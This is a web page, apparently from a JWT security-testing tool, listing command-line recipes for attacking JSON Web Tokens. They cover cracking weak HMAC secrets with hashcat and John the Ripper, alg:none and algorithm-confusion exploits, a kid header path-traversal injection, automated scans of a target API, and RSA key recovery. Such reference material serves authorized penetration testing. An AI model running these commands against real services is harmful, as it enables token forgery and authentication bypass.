CLI Cheatsheet

Ready-to-use commands for operations too compute-heavy for the browser.

Browser vs CLI
JWT Arsenal handles all crypto in-browser. For GPU brute-force of weak HMAC secrets and RSA key recovery (GCD over 4096-bit numbers), you need dedicated CLI tools listed here.
VulnerabilityToolCommandNotes
Weak HMAC Secrethashcat hashcat -m 16500 jwt.txt /path/to/rockyou.txtMode 16500 = JWT. Add -r rules/best64.rule for rule-based attack.
Weak HMAC Secrethashcat hashcat -m 16500 jwt.txt -a 3 ?a?a?a?a?a?aBrute-force mode. Use ?a for all ASCII printable chars.
Weak HMAC Secretjohn john --format=HMAC-SHA256 jwt.txt --wordlist=/path/to/rockyou.txtJohn the Ripper - format varies by JWT algorithm.
Weak HMAC Secretjwt_tool python3 jwt_tool.py <JWT> -C -d /path/to/wordlist.txt-C = crack mode, -d = dictionary file.
Public Key Recoveryrsa_sign2n python3 jwt_forgery.py "<JWT1>" "<JWT2>"Requires 2 RS256 tokens from same key. Outputs candidate public keys.
Algorithm Nonejwt_tool python3 jwt_tool.py <JWT> -X a-X a = alg:none exploit. Tests all casing variants.
Algorithm Confusionjwt_tool python3 jwt_tool.py <JWT> -X k -pk public.pemUses public.pem as HMAC secret for HS256 signing.
KID Path Traversaljwt_tool python3 jwt_tool.py <JWT> -I -hc kid -hv "../../../../../../dev/null" -S hs256 -p ""-I = inject header claim, -hc = claim name, -hv = value.
Generic Tamperingjwt_tool python3 jwt_tool.py <JWT> -T-T = tampering mode (interactive). Good for manual claim modification.
Scan for vulnerabilitiesjwt_tool python3 jwt_tool.py <JWT> -t https://target.com/api -rh 'Authorization: Bearer JWT' -M pb-M pb = playbook scan. Tests common JWT attack vectors automatically.

Tool Setup

jwt_tool
git clone https://github.com/ticarpi/jwt_tool
cd jwt_tool
pip3 install -r requirements.txt
python3 jwt_tool.py --help
rsa_sign2n
git clone https://github.com/silentsignal/rsa_sign2n
cd rsa_sign2n
pip3 install -r requirements.txt
python3 standalone/jwt_forgery.py --help

Wordlists

rockyou.txt
Classic 14M password list
View →
scraped-JWT-secrets.txt (SecLists)
JWT-specific secrets list
View →

Tool Reference

jwt_tool
Python toolkit for JWT testing, tampering, and exploitation
GitHub →
rsa_sign2n
RSA public key recovery from JWT signatures
GitHub →
hashcat
GPU-accelerated password recovery (mode 16500 for JWT)
hashcat.net →
john
John the Ripper - classic CPU-based cracker
openwall.com →
GitHub
JWT Arsenal_
Loading cryptographic engineOK
Importing exploit modulesOK
Verifying secure contextOK
All systems operational
100% CLIENT-SIDE · NO DATA LEAVES YOUR BROWSER